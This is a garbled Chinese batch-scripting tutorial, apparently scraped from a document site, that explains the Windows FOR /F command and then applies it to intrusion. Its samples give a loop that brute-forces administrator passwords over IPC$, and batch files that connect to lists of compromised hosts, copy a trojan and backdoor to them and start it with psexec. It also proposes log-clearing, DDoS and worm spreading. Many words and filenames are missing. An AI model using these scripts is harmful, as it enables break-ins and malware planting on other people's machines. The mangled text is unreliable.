【文章內(nèi)容簡介】 (5 4 3 2 1)。 FOR /F [options] %variable IN (fileset) DO mand FOR /F [options] %variable IN (string) DO mand FOR /F [options] %variable IN (mand) DO mand 或者，如果有 usebackq 選項 : FOR /F [options] %variable IN (fileset) DO mand FOR /F [options] %variable IN (string) DO mand FOR /F [options] %variable IN (mand) DO mand filenameset 為一個或多個文件名。繼續(xù)到 filenameset 中的下一個文件 之前，每份文件都已被打開、讀取并經(jīng)過處理。 處理包括讀取文件，將其分成一行行的文字，然后將每行解析成零或更多的符號。然后用已找到的符號字符串變量值調(diào)用 For 循環(huán)。以默認方式， /F 通過每個文件的每一行中分開的第一個空白符號。跳過空白行。 您可通過指定可選 options參數(shù)替代默認解析操作。這個帶引號的字符串包括一個或多個指定不同解析選項的關(guān)鍵字。這些關(guān)鍵字為 : eol=c 指一個行注釋字符的結(jié)尾 (就一個 ) skip=n 指在文件開始時忽略的行數(shù)。 delims=xxx 指 分隔符集。這個替換了空格和跳格鍵的 默認分隔符集。 tokens=x,y,mn 指每行的哪一個符號被傳遞到每個迭代 的 for 本身。這會導致額外變量名稱的 格式為一個范圍。通過 nth 符號指定 m 符號字符串中的最后一個字符星號， 那么額外的變量將在最后一個符號解析之 分配并接受行的保留文本。 usebackq 指定新語法已在下類情況中使用 : 在作為命令執(zhí)行一個后引號的字符串并且引號字符為文字字符串命令并允許在 fi中使用雙引號擴起文件名稱。 sample1: FOR /F eol=。 tokens=2,3* delims=, %i in () do mand 會分析 中的每一行，忽略以分號打頭的那些行，將每行中的第二個和第三個符號傳遞給 for 程序體；用逗號和 /或空格定界符號。請注意，這個 for 程序體的語句引用 %i 來取得第二個符號，引用 %j 來取得第三個符號，引用 %k來取得第三個符號后的所有剩余符號。對于帶有空格的文件名，您需要用雙引號將文件名括起來。為了用這種方式來使用雙引號，您還 需要使用 usebackq 選項，否則，雙引號會被理解成是用作定義某個要分析的字符串的。 %i 專門在 for 語句中得到說明， %j 和 %k 是通過 tokens= 選項專門得到說明的。您可以通過 tokens= 一行指定最多 26 個符號，只要不試圖說明一個高于字母 z 或 Z 的變量。請記住， FOR 變量是單一字母、分大小寫和全局的同時不能有 52 個以上都在使用中。 您還可以在相鄰字符串上使用 FOR /F 分析邏輯；方法是，用單引號將括號之間的 filenameset 括起來。這樣，該字 符串會被當作一個文件中的一個單一輸入行。 最后，您可以用 FOR /F 命令來分析命令的輸出。方法是，將括號之間的 filenameset 變成一個反括字符串。該字符串會被當作命令行，傳遞到一個子 ，其輸出會被抓進內(nèi)存，并被當作文件分析。因此，以下例子 : FOR /F usebackq delims== %i IN (`set`) DO @echo %i 會枚舉當前環(huán)境中的環(huán)境變量名稱。 另外， FOR 變量參照的替換已被增強。您現(xiàn)在可以使用下列 選項語法 : ~I 刪除任何引號 ()，擴充 %I %~fI 將 %I 擴充到一個完全合格的路徑名 %~dI 僅將 %I 擴充到一個驅(qū)動器號 %~pI 僅將 %I 擴充到一個路徑 %~nI 僅將 %I 擴充到一個文件名 %~xI 僅將 %I 擴充到一個文件擴展名 %~sI 擴充的路徑只含有短名 %~aI 將 %I 擴充到文件的文件屬性 %~tI 將 %I 擴充到文件的日期 /時間 %~zI 將 %I 擴充到文件的大小 %~$PATH:I 查找列在路 徑環(huán)境變量的目錄，并將 %I 擴充到找到的第一個完全合格的名稱。如果環(huán)境變量未被定義，或者沒有找到文件，此組合鍵會擴充空字符串 可以組合修飾符來得到多重結(jié)果 : %~dpI 僅將 %I 擴充到一個驅(qū)動器號和路徑 %~nxI 僅將 %I 擴充到一個文件名和擴展名 %~fsI 僅將 %I 擴充到一個帶有短名的完整路徑名 %~dp$PATH:i 查找列在路徑環(huán)境變量的目錄，并將 %I 擴充到找到的第一個驅(qū)動器號和路徑。 %~ftzaI 將 %I 擴充到類似輸出線路的 DIR 在以上例子中， %I 和 PATH 可用其他有效數(shù)值代替。 %~ 語法 用一個有效的 FOR 變量名終止。選取類似 %I 的大寫變量名比較易讀，而且避免與不分大小寫的組合鍵混淆。 以上是 MS的官方幫助，下面我們舉幾個例子來具體說明一下 For命令在入侵中的用途。 sample2： 利用 For命令來實現(xiàn)對一臺目標 Win2k主機的暴力密碼破解。 我們用 use \\ip\ipc$ password /u:administrator來嘗試這和目標主機進行連接，當成功時記下密碼。 最主要的命令是一條： for /f i% in () do use \\ip\ipc$ i% /u:administrator 用 i%來表示 admin的密碼，在 i%的值用 use 命令來連接。然后將程序運行結(jié)果傳遞給 find命令－－ for /f i%% in () do use \\ip\ipc$ i%% /u:administrator find :命令成功完成 D:\ ，這樣就 ko了。 sample3： 你有沒有過手里有大量肉雞等著你去種后門＋木馬呢？，當數(shù)量特別多的時候，原本很開心的一件事都會變得很郁悶：）。文章開頭就談到使用批處理文件，可以簡化日常或重復性任務(wù)。那么如何實現(xiàn)呢？呵呵，看下去你就會明白了。 主要命令也只有一條：（在批處理文件中使用 FOR 命令時，指定變量使用 %%variable） @for /f tokens=1,2,3 delims= %%i in () do start call %%i %%j %%k tokens的用法請參見上面的 sample1，在這里它表示按順序?qū)? 中的內(nèi)容傳遞給 %i %j %k。 而 use命令來建立 IPC$連接，并 copy 木馬＋后門到 victim，然后用返回碼（ If errorlever =）來篩選成功種植后門的主機，并 echo出來，或者 echo到指定的文件。 delims= 表示 中的內(nèi)容是一空格來分隔的。我想看到這里你也一定明白這 里的內(nèi)容是什么樣的了。應(yīng)該根據(jù) %%i %%j %%k表示的對象來排列，一般就是 ip password username。 代碼雛形： cut here then save as a batchfile(I call it at ) @echo off @if %1== goto usage @for /f tokens=1,2,3 delims= %%i in () do start call %%i %%j %%k @goto end :usage @echo run this batch in dos just doubleclick it. :end cut here then save as a batchfile(I call it at ) cut here then save as a batchfile(I call it do) @ use \\%1\ipc$ %3 /u:%2 @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection ???? OK @copy \\%1\admin$\system32 amp。amp。 if not errorlevel 1 echo IP %1 USER %2 PWD %3 @psexec \\%1 c:\winnt\system32\ @psexec \\%1 start windrv32 amp。amp。 if not errorlevel 1 echo %1 Backdoored :failed @echo Sorry can not connected to the victim. cut here then save as a batchfile(I call it door.bat) 這只是一個自動種植后門批處理的雛形，兩個批處理和后門程序（ ） ,PSe 需放在統(tǒng)一目錄下 .批處理內(nèi)容 尚可擴展 ,例如 :加入清除日志 +DDOS的功能 ,加入定時添加用戶的功能 ,更深入一點可以使之具備自動傳播功能 (蠕蟲 ).此處不多做敘述 ,有興趣的朋友可自行研究 . 二 .如何在批處理文件中使用參數(shù) 批處理中 可以使用參數(shù)，一般從 1%到 9%這九個，當有多個參數(shù)時需要用 shift來移動，這種情況并不多見，我們就不考慮它了。 sample1： @echo off if %1==a format a: :format @format a:/q/u/auotset